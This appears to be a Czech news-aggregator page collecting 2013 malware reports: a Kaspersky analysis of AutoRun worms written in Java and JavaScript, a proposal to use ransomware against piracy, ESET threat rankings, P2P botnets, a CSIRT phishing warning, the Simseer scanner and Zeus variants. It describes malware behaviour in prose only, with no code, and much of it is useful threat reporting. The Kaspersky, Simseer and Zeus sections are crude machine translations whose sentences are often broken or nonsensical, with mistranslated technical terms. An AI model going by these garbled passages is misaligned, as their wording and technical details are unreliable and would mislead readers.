Poslední měsíce přinesly trochu zájmu mezi červy napsán v Javě a skriptovací jazyky, jako je JavaScript a VBScript. Hlavním důvodem byla omezená znalost virových spisovatelů, jejichž tvorba byla něco, ale pozoruhodné. Nicméně, pár vzorků malwaru chytil naši pozornost, jejich složitost je důkazem toho, že odborníci někdy se zapojí také.
Produkty společnosti Kaspersky Lab detekuje tyto speciální červy Worm.JS.AutoRun a Worm.Java.AutoRun. Oni jsou také detekovány heuristických metod, jako Heur: Worm.Script.Generic a HEUR: Worm.Java.Generic resp.
Tyto dva červi mají tři klíčové vlastnosti společné: těžký zmatek, backdoor typu základní užitečné zatížení, a podobné metody propagace. Oba červi šíří kopírováním sebe sama a konfigurační soubor autorun.inf do kořenové složky logických svazků vyměnitelných paměťových médií a síťové disky. Pokud jsou tyto nakažené sklady jsou otevřeny na jiných počítačích, může infekce šířit. Po infekci operační systém a založil záchytného bodu v napadeném počítači se škodlivé programy nasadit své hlavní užitečné zatížení.
Několik měsíců, počet červů AutoRun zjištěn v počítačích Kaspersky Lab uživatelů v podstatě nezměnila. Podle Kaspersky Security Network údajů polovina všech skriptů sešíří sebe tímto způsobem. Pokud jde o červy Java, to není jejich obvyklý způsob množení. Nicméně, v posledních třech měsících jsme viděli dramatický nárůst počtu nových Worm.Java.AutoRun úprav.
Detekční limity pro Java červů, AutoRun Java červy a zjištěné heuristickou analýzou AutoRun Java červy srpna 2011 - květen 2013
Oba červi jsou polymorfní: oni modifikují své tělo během množení, což ztěžuje jejich detekci. To je jeden z důvodů, proč oni stali se více prominentní ve srovnání s "pravidelný" červy.
Níže je vyprávění o tom, co jsme se setkali.
Worm.Java.AutoRun
Není mnoho Java rezidentní malware programy pro PC, a červi jsou obzvláště vzácné. Takže jsme provedli podrobnou analýzu tohoto vzorku.
Červ využívá se na infikovaném počítači v podobě čtyř souborů:
Archiv Java: hlavní složkou, jeho název se změní v každém pokusu infekce. Je umístěn v dočasném uživatelů TEMP složce%% \ jar_cache *. Tmp. Autorun.inf: konfigurační soubor, který zajišťuje červa se spouští automaticky při otevření infikovaných externí paměťové médium nebo montáž síťové jednotky. DLL souboru: pomocné (Win 32) DLL, která je zodpovědná za součást propagace úkolu. Název tohoto souboru se také liší: je definována v době, kdy je napaden počítač. DLL je zkopírován do uživatelského dočasné složky:% TEMP% \% USERNAME% hsperfdata_ \ Java.exe je právní spustitelný soubor předinstalovaného balíku JAVA. Červ se používá to, aby bylo zajištěno, že může vždy nahrají se do paměti infikovaného počítače. Při výskytu infekce, je tento spustitelný soubor vyrovnali z% ProgramFiles% na uživatele dočasné složky (vedle výše DLL) a je uveden název spojený se systémovým procesem, např. Winlogon, CSRSS, nebo služby. Dále je proveden pomocí spuštění parametry Java archivu, který je hlavní složkou.
Fragment třídního souboru škodlivého JAVA archivu
Po inicializaci škodlivý Java archiv extrahuje dll ze sebe, zkopíruje do dočasné uživatele katalogu, a také kopíruje výkonný souborový java.exe z% ProgramFiles% ke stejnému katalogu, dávat to "důvěryhodné" jméno a spuštěním se zahájit parametry duplikované archivu Java. Pak Java archiv vstřikuje nad knihovny do procesu vytvořeného pro distribuci červa jakýchkoli dostupných síťových částí a vyměnitelných médií. Zahájila malware občas odesílá požadavky na velitelské centrum přijímat pokyny od cybercriminal.
Stejně jako tyto vtípky, tento červ také používá silné mlžení. Zde pěch se používá ve spojení s Zelix KlassMaster mlžení. Také, jak je uvedeno výše, červ je polymorfní. Toto dělá to více obtížný pro antivirová řešení pro detekci.
Podle Kaspersky Security Network je červ nejvíce široce distribuovaný v Indii a Malajsii. Celkový obraz se zobrazí na mapě níže.
Zeměpisné rozložení uživatelů chráněných před Worm.Java.AutoRun, leden-květen 2013
Podle stejných údajů byl červ nejčastěji vyzvednout produktů společnosti Kaspersky Lab na konci května. Většina z těchto zjištěných podle svých nejnovějších úprav, ty, které vyvolal náhlý prudký nárůst detekcí. Tento červ je stále aktivně distribuovat sám, a tak jsme se i nadále pozorně sledovat jeho činnost.
Počet uživatelů chráněných před Worm.Java.AutoRun, duben-květen 2013
Worm.JS.AutoRun
Distribuční model tohoto červa nejen používá výše uvedené metody s autorun.inf, ale také FTP servery, weby sdílení souborů, sdílené složky a CD / DVD vypálené na infikovaných počítačích.
Červ množí se v katalozích a přidá jeho uvedení na automatické spuštění. V této době se kontroluje na prostředí, ve kterém bylo uvedeno na trh. Pokud je červ spuštěn na non-virtuální stroj, začne hledat aktivního monitorování a nástroje ochrany počítače. Pokud jsou zjištěny, červ ukončí svou práci.
Malware přijímá příkazy přes soubor stažen z velitelského centra. Tyto pokyny jsou většinou o shromažďování informací z infikovaného systému. Zejména zločinci chtějí červ získat informace o systému, uživatel a instalovaného softwaru.
Stejně jako Worm.Java.AutoRun, tento vzorek je dobře šifrována a mohou měnit svoji podobu v různých infekcí.
Fragment kódu pro Worm.JS.AutoRun
Stejně jako červa Java, tento malware je nejrozšířenější v jihovýchodní Asii, ale tato varianta je aktivnější ve Vietnamu a Indonésii.
Zeměpisné rozložení uživatelů chráněných před Worm.JS.AutoRun od počátku roku 2013 do konce května 2013,
Počet uživatelů chráněna před Worm.JS.AutoRun na začátku roku 2013 do konce května 2013
V tomto schématu můžete vidět počet uživatelů chráněných s podpisem metody pouze. Daleko více uživatelů jsou chráněny heuristické metody, jak je uvedeno v prvním schématu.
Podle Kaspersky Security Network dat, systém Windows XP je široce používán v zemích s velkým počtem malware detekce. Novější verze Microsoft požádejte uživatele o potvrzení spuštění autorun, což snižuje šance na získání infekce. Počínaje Windows 7 jsou pouze na CD / DVD nosiče povoleno spustit automaticky. Při použití externích úložných zařízení (např. USB flash disk), je autorun vypnutý.
V zájmu ochrany počítače před napadením, doporučujeme aktualizovat OS kritické jednotky a antivirové databáze v počítači nainstalována. Najdete zde pokyny o tom, jak nastavit funkci automatického spuštění a odkazy na aktualizace v následujícím článku Microsoft: http://support.microsoft.com/kb/967715
Budou distributoři hudby a filmu používat viry pro omezení pirátství?
Viry
Filmový a hudební průmysl má dlouhodobý problém s pirátstvím. Prodeje CD a DVD stále klesají, všechna hudební alba, filmy a seriály s trochou šikovnosti můžete najít na internetu. Tak proč za to platit? Opravdu účinným donucovacím prostředkem pro nepoctivé konzumenty nelegální hudby a filmů by mohly být počítačové viry.
Nápad, který se objevil v osmdesátistránkové zprávě komise věnující se krádežím amerického duševního vlastnictví, je šokující. Počítá s využitím nástrojů, které až dosud využívali výhradně počítačoví zločinci a tajné služby. Návrhy uvnitř zprávy mluví o legálním využití rootkitů, spyware a dalších kódů, které obvykle pomáhají zločincům k nelegálním výdělkům.
Jak by pomocí těchto nástrojů donutily uživatele zaplatit za produkt duševního vlastnictví? Jednoduchý návod ukazuje nedávný tzv. „policejní virus“, který se v květnu šířil mezi českými internetovými uživateli. Infikovaný počítač nešel vypnout a strašil uživatele obviněním z distribuce dětské pornografie a šíření spamu. Šlo se ale vykoupit částkou 2 000 korun, kterou pošlete přes některou z transakčních služeb.
Podobný postup navrhuje i tato zpráva. Pokud by trojský kůň nebo spyware ve vašem počítači našly na vašem disku nelegálně staženou písničku nebo díl seriálu, došlo by k zablokování vašeho počítače. Abyste ho mohli zase odemknout, museli byste se přiznat na policii. Teprve až poté byste obdrželi přístupový kód deaktivující ransomware, který byl na váš počítač zavlečen za účelem vybrat „výpalné“.
I pokud byste škodlivý kód dokázali deaktivovat, nahrávací společnosti by měly k dispozici nahrávku z vaší webkamery a další důkazy, které jsou uložené na vašem disku. Přestože se jedná pouze o návrh, představa virů a dalšího malwaru jako prostředku boje proti internetovému pirátství nebo jakémukoli jinému nelegálnímu jednání, je zcela nová a právně a eticky problematická.
Komise tvrdí, že takováto opatření neporušují existující zákony užívání internetu. Pokud má pravdu, pak by pouze uživatelé měli mít právo rozhodovat o tom, kdo bude mít přístup k jejich datům. Možná nás tak do budoucna budou antivirové programy chránit nejen před kyberzločinci, ale také před organizacemi, které chrání autorská práva.
Vláda malwaru Autorun jako největší hrozby končí
Podíl malwaru INF/Autorun, který vládl žebříčku nejčastějších hrozeb více než 12 měsíců, v květnu 2013 výrazně klesl - v čele jej nahradil Win32/Bundpil s podílem téměř 3,7 %.
Viry
Uvádí to statistiky Eset Live Grid - podle analytiků se za těmito dvěma škodlivými kódy se umístily hrozby HTML/ScrInject a Win32/Sality s globálním podílem 2,7%, resp. 2,6 %. V České republice je situace naprosto odlišná. INF/Autorun ani Win32/Bundpil se vůbec nevešly do první desítky, a třetí měsíc po sobě je na vrcholu českého žebříčku hrozba HTML/Fraud s podílem 6,94 %.
Hrozba Win32/Bundpil se do světové TOP 10 dostala teprve minulý měsíc. V květnu se jí podařilo dokonce obsadit první místo, a to s poměrně výrazným náskokem. Jedná se o červa šířícího se pomocí přenosných médií. Hrozba obsahuje URL adresy, z nichž se pokouší stahovat další soubory.
INF/Autorun představuje různé druhy malwaru využívající jako cestu k napadení počítače soubor autorun.inf. Tento soubor obsahuje příkaz k automatickému spuštění aplikace po připojení externího média (nejčastěji USB flash disku) k počítači s operačním systémem Windows.
HTML/ScrInject.B je generická detekce webových HTML stránek obsahující falešný script nebo iframe tag, který automaticky přesměruje uživatele ke stahování škodlivého kódu. Win32/Sality je polymorfní hrozba napadající soubory. Prostřednictvím screenshotů rozesílá informace, stahuje soubory ze vzdálených počítačů a internetu a vypíná a restartuje počítač.
HTML/Fraud, který řádí v České republice, je hrozba lákající na výhry v imaginárních soutěžích, většinou o produkty Apple. Uživatel, který poskytne své osobní údaje pro další využití nebo prodej, může očekávat pravidelný přísun prémiových SMS zpráv na svůj mobilní telefon.
Vzrůstá používání komunikace P2P k šíření malwaru
Množství malwaru, který používá komunikaci typu peer-to-peer, se za poslední rok zpětinásobilo. Zjistili to výzkumníci ze společnosti Damballa.
Viry
Největší podíl na tomto vzrůstu mají pokročilé hrozby jako ZeroAcces, Zeus 3 a TDL4, řekl Stephen Newman, produktový viceprezident společnosti Damballa. Dodal, že i další skupiny malwaru poslední dobou začínají P2P využívat pro své řídící uzly. „Využívání P2P v pokročilých malwarových hrozbách už se děje delší dobu, ale nikdy jsme nepozorovali, že by mělo takový význam, jaký zaznamenáváme v současnosti.“
Podle Newmana může být důvodem touha kyberzločinců po větší odolnosti proti pokusům o jejich vyřazení, které mohou narušit centralizované struktury botnetů. V případě vypnutí řídících serverů ztratí správci botnetu přístup k tisícům nebo dokonce milionům infikovaných počítačů. Komunikace přes P2P je decentralizovaná a klienti botnetu si mohou posílat příkazy vzájemně. Další výhodou pro útočníky je, že přenos P2P je na síťové úrovni hůře dohledatelný a blokovatelný za použití tradičního přístupu, který se spoléhá na seznam známých adres IP a hostitelů, spojených s řídícími servery.
Nejrozšířenější skupinou malwaru, která používá komunikaci P2P, je podle Johna Jerrima, vědeckého pracovníka v Damballe, pravděpodobně TDL4. Ten však používá P2P pouze jako zálohu v momentech, kdy nemůže kontaktovat primární server DGA (domain generation algorithm). Malware TDL4 je známý velkou odolností. Pokud se do počítače dostane, je velmi těžké ho odstranit, protože infikuje zaváděcí záznam, speciální část pevného disku, která obsahuje kód spouštějící se před startem operačního systému. Tento nástroj se používá především k distribuci dalšího malwaru.
Virus známý jako GameOver nebo Zeus verze 3 je trojský kůň, který krade bankovní údaje a další data spojená s financemi. Na rozdíl od TDL4 používá Zeus v3 P2P jako primární řídící uzel a DGA pouze jako zálohu.
Nejzajímavější hrozbou je ZeroAcces, který pro řízení používá pouze P2P. Malware je šířen s pomocí webových nástrojů, například Blackhole, Neosploit nebo Sweet Orange a je používán především k podvodům při těžení Bitcoinů.
Společnost Damballa vydala zprávu (v PDF) o používání komunikace P2P v úterý.
Na nový virus jsou antivirové programy krátké, varují odborníci
28.5.2013 Viry Národní bezpečnostní tým CSIRT varoval před novým zákeřným virem, který nedokážou antivirové programy rozeznat. Nezvaní návštěvníci se šíří prostřednictvím podvodných e-mailů, o kterých již Novinky informovaly v pondělí.
Zvětšit obrázek FOTO: Archiv, Právo Dnes 19:17 Škodlivé kódy se šíří prostřednictvím e-mailů, které vypadají jako přeposlaná MMS zpráva. První pokusy pirátů o vniknutí do počítače dokázaly antiviry zachytit, v ohrožení tak byli výhradně uživatelé nechránění bezpečnostním softwarem.
Na novou verzi jsou ale již antiviry krátké. „Pracovníci CSIRT.CZ důrazně varují před novou verzí přiloženého viru, kterou již antivirové produkty nedokáží v současnosti rozpoznat,“ podotkl bezpečnostní analytik CSIRTu Pavel Bašta.
Útok cílí na zákazníky všech předních operátorů Podle něj navíc útočníci rozšířili své portfolio o další doménu, ze které podvodné e-maily rozesílají. „Podle informací od uživatelů bylo zaznamenáno rozesílání těchto zpráv nově také z adresy noreply@o2.com,“ uvedl bezpečnostní analytik CSIRTu.
Až doposud se přitom počítačoví piráti zaměřovali výhradně na uživatele operátorů Vodafone a T-Mobile. [celá zpráva]
Útok probíhá vždy ve stejné režii, podvodný e-mail obsahuje přílohu se souborem ve formátu ZIP. „Po rozbalení uživatel získá soubor s názvem ‚MMS_IMG 03276311.jpg.exe‘. Útočník počítá s tím, že nepozorný uživatel spustí virus v domnění, že se jedná o neškodný obrázek. Ve skutečnosti si však do počítače nainstaluje nebezpečný kód,“ varoval Bašta.
Na aktualizace se zatím čeká Je více než pravděpodobné, že s hrozbou si antivirové společnosti poradí v řádech hodin nebo maximálně dnů. Do té doby je ale více než vhodné podobné zprávy vůbec neotevírat a rozhodně do počítače nestahovat žádné přílohy.
Podobným útokům byli na konci loňského roku vystaveni uživatelé komunikační služby Skype, prostřednictvím které se šířil trojský kůň nazývaný Dorkbot. Tento nezvaný návštěvník na napadených počítačích sbírá citlivé údaje a dál se prostřednictvím infikovaného stroje šíří po internetu – lidem ze seznamu kontaktů začnou chodit zprávy nabízející nový profilový obrázek.
Skener identifikuje malware kmeny, může být budoucnost AV 24.05.2013 Viry
Pokud jde jen na hledání malwaru, podpis na bázi odhalování, heuristice a cloudové uznávání a sdílení informací používá mnoho antivirových řešení dnes fungují bez problémů do určité míry, ale polymorfní malware ještě dá jim běžet za své peníze. Na roční AusCert konferenci tento týden v Austrálii doktorát z kandidátů Deakin University v Melbourne představila výsledky svého výzkumu a práce, které to může být řešením tohoto problému. Bezpečnostní výzkumník Silvio Cesare si všiml, že malware kód se skládá z malých "struktur", které zůstávají stejné i po mírné změny v jeho kódu. "Použití struktur, můžete zjistit přibližné shody škodlivého softwaru, a to je možné vybrat celou rodinu škodlivého softwaru docela snadno jen s jedné struktury," řekl sdílet s ČSÚ Austrálii. Tak on vytvořil Simseer , zdarma on-line služba, která provádí automatickou analýzu předložených vzorků malwaru a řekne a ukáže vám, jak podobné jsou na jiné předložených vzorků. To skóre podobnosti mezi malware (jakýkoliv druh softwaru, opravdu), a to grafy výsledků a vizualizuje programu vztahy jako evolučního stromu. Jestliže vzorek obsahuje méně pak 98 procent podobnost s již existující malware kmene, dostane vzorek katalogizovány jako zcela nový kmen. Podle webové stránky, Simseer detekuje malware tok řízení, kterým se mění mnohem méně než řetězec podpisů nebo podobné funkce a polymorfní a metamorfovaných malware varianta obvykle sdílejí stejný tok řízení. To běží na clusteru Amazon EC2 s tucet nebo tak virtuální servery, a je "krmil" od Cesare každý večer GB malware kódu stažené z jiných volných zdrojů, jako VirusShare. Zatím Simseer identifikoval více než 50.000 kmeny škodlivého softwaru a počet stále roste. Cesare se stále pracuje na zdokonalování služeb, a doufá, že pomůže malware analytikům jejich výzkumu. Pro tuto chvíli, jeho použití je zdarma pro každého. To je zajímavé poznamenat, že tato služba je schopen více než jen odhalení a katalogizace vzorků malwaru. Jak již bylo řečeno, že pracuje na nějakém druhu softwaru, a mohou být použity pro plagiátorství a software krádeže detekce, stejně jako reakce na události.
Zeus varianty jsou zpět s pomstou 24.05.2013 Viry
Po analýze zpětné vazby od společnosti Smart Protection Network, Trend Micro vědci zaznamenali vzestup pokusů Zeus / Zbot Trojan infekce.
Poté, co byl prakticky neexistuje v lednu, květnu zbytek měsíce až do začátku svědky souvislou nárůst počtu pokusů Zeus / Zbot Trojan infekce, odborníci Trend Micro poukázal. Hlavním cílem malwaru je stejná jako předtím:. krade jakýkoliv typ on-line pověření, včetně těch pro uživatele internetového bankovnictví, a jakékoliv osobní informace, které by mohly být užitečné pro trestně-smýšlejícími jednotlivci Stále, novější varianty byly trochu změnil (ne že by to v konečném důsledku záleží . mnoho obětí) Nyní vytvořte dvě různé složky v systému: kdo schoval svou kopii a druhou hostit ukradený a šifrované informace a konfigurační soubor se stáhnout ze vzdáleného serveru. Co bylo dříve dát do jedné složky v systému Windows " % System% složce je nyní k náhodné pojmenovaných složek v % dat aplikací% složky. "Zbot malware z této generace se zjistí, že většinou jeden Citadela nebo GameOver varianty. rozdíl od starší verze , název mutex je náhodně generováno, "výzkumníci poukázal . "Obě varianty posílat DNS dotazy randomizovaných doménových jmen. Rozdíl ve variantě GameOver je, že otevře náhodný port UDP pakety a posílá encrypted před odesláním DNS dotazů randomizovaných doménových jmen." Konfigurační soubory jsou, jako obvykle, se mohou změnit v závislosti na ., které informace se útočníci chtějí ukrást, a malware stále snaží, aby se zabránilo prohlížeče od bytí schopného navštívit zabezpečení stránky "Co se můžeme naučit od Zeus / Zbot bodec v posledních měsících je jednoduchý: staré hrozby jako Zbot vždy na scénu, protože zločinci těží z nich, "vědci varují a radí:" Je důležité být opatrní při otevírání e-mailových zpráv nebo kliknutím na odkazy Bookmark důvěryhodné weby a vyhýbají se návštěvám neznámých ty Udržujte svůj systém up-to-data s nejnovější aktualizací zabezpečení.. od výrobců a dodavatelů bezpečnostních a nainstalovat důvěryhodný pro boj s malware ochranu. "